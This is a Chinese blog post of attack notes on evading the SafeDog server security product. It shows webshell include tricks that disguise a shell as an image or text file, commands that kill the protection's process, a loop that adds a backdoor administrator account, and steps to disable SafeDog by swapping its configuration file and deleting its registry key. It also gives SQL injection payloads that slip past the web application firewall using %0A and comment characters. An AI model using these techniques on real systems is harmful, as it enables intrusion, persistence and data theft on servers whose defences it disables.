昔日

· 包含结束进程杀狗

0y's Blog - 致力关注于网络 | 网络信息安全

包含shell过狗

asp:<!–#include file=”lcx.asp;1.jpg”–>

php:<?php
include(‘logo.txt’);
?>

 

强制结束进程:  taskkill /f /t /im SafeDogGuardCenter.exe

结束进程2:  ntsd -c q -pid 1032

 

安全狗,在命令下添加用户:

for /l %i in (1,1,1000) do @net user test test /add&@net localgroup administrators test
/add

ad.bat 使用
for /l %%i in (1,1,1000) do @net user test test /add&@net localgroup administrators test
/add

 

安全猪开启各种保护,突破方法:

首先在Shell下把安全猪的安装配置给下来 默认安装路径:

C:\Program Files\SafedogServer\SafeDogGuardCenter\Config\DirDefend.xml

导入本地的安全服务器安全狗查看 主动防御 – 文件及目录保护 查看是否开启各种保护

如果开启了,直接关掉。然后再把DirDefend.xml替换到远程服务器上去,重启服务器,各种操作。

 

 

安全猪开启密码保护模式,突破方法:

打开注册表 regedit ,找到HKEY_LOCAL_MACHINE\SOFTWARE\Safedog\SafedogSR 删除SafedogSR 即可
突破安全猪密码保护。

 

 

测试时间:2014.10.21

测试版本:IIS版V3.3.09476(2014-09-24)、Apache V3.1.08512(2014-05-29),均为今天能下到的最
新版。
用于绕过的核心字符:%0A,某些特殊场合需要和注释符配合使用。

测试详细步骤:
1、本机安装了存在注入的V5shop(构架为IIS6+ASPX+MSSQL2005,以测试IIS版本的安全狗),常规注
入测试:
https://192.168.91.152/cart.aspx?act=buy&id=1 AND 1=user

另外:在Apache+php+Mysql环境中:
先按常规进行注入尝试:
https://192.168.91.152:8000/About.php?did=2 and/**/(select user())=”

因为and、user()均为黑名单里的关键字。那么我们加入%0A再次尝试:
https://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=”
https://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=’root@localhost’

当然,%0A只是一个思路,由此发散开来便是多个%0A叠加,或者与注释符–、/**/混合使用。比如:
https://192.168.91.152:8000/About.php?did=-2%0Aunion–%0Aselect%0Auser()



评论

热度(5)